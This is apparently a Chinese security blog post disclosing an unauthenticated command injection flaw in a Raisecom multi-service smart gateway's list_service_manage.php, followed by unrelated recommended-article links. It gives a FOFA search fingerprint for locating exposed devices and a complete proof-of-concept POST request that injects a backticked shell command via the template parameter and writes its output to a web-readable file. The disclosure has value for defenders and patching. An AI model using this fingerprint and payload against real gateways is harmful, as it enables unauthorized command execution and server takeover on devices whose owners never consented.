某智能网关 list_service_manage存在命令执行漏洞

外道・輪廻天生2024-09-12 1:06

漏洞描述

瑞斯康达多业务智能网关list_service_manage.php存在未授权命令注入漏洞,攻击者利用可获取服务器权限。

资产信息

FOFA:

复制代码 
body="/images/raisecom/back.gif"

漏洞复现

poc

复制代码 
POST /vpn/list_service_manage.php?template=%60whoami%3E%2Fwww%2Ftmp%2F1.txt%60 HTTP/1.1
Host: 
Content-Type: application/x-www-form-urlencoded


Nradius_submit=true

访问文件url+/tmp/1.txt获取命令回显

相关推荐
terry6001 分钟前
2026图形验证码服务商横向测评|口碑、接入、安全选型全指南
java·大数据·人工智能·web安全·信息与通信·数据库架构
leagsoft_100344 分钟前
某航终端安全治理实践:以一体化建设夯实数字办公安全底座
安全
持敬chijing1 小时前
Web渗透之前后端漏洞-文件上传漏洞-过滤绕过与配置文件漏洞-条件竞争漏洞
前端·安全·web安全·网络安全·网络攻击模型·安全威胁分析
zhengzhouliuhaha2 小时前
智能医疗设备控费系统:以全院一体化管控,筑牢医疗资源“安全阀”
大数据·数据结构·人工智能·算法·安全·机器学习·软件需求
阿正的梦工坊3 小时前
【Rust】17-Send、Sync 与并发安全抽象
算法·安全·rust
YIN_尹3 小时前
探测+检测+缓解(PDM):让云租户自主防御微架构攻击
安全·缓存·架构
阿正的梦工坊4 小时前
【Rust】13-Trait 系统、动态分发与对象安全
算法·安全·rust
江湖有缘4 小时前
Docker部署开源LinkAI大模型安全接入网关服务平台
安全·docker·开源
罗超驿4 小时前
10.Java单例模式全解析:饿汉式与懒汉式实现及线程安全深度剖析
安全·单例模式·javaee
紫金桥软件4 小时前
国产化信创浪潮下,如何选择组态软件
安全·国产化·scada·国产工业软件·监控组态软件
热门推荐
01《置身钉内》原文-可播放阅读02Claude Code、Codex、Cursor三分天下:2026年AI编程Agent生态全景剖析03【AI】2026 年具身智能模型和世界模型总结04AI科技热点日报 | 2026年6月1日05GitHub 镜像站点062026 AI 编程工具终极实战指南:Cursor vs Claude Code vs Copilot,开发者该怎么选?072026年6月AI行业全景:从百模大战到Agent元年,这30天发生了什么?082026 年 AI 编程工具终极横评:Cursor vs Claude Code vs Copilot vs Windsurf09Codex 下载安装指南:Windows 和 macOS 官方版下载10【踩坑记录 | 第一篇】微软商店无法使用时,如何手动安装 OpenAI Codex?附`.msix`文件系统错误解决方法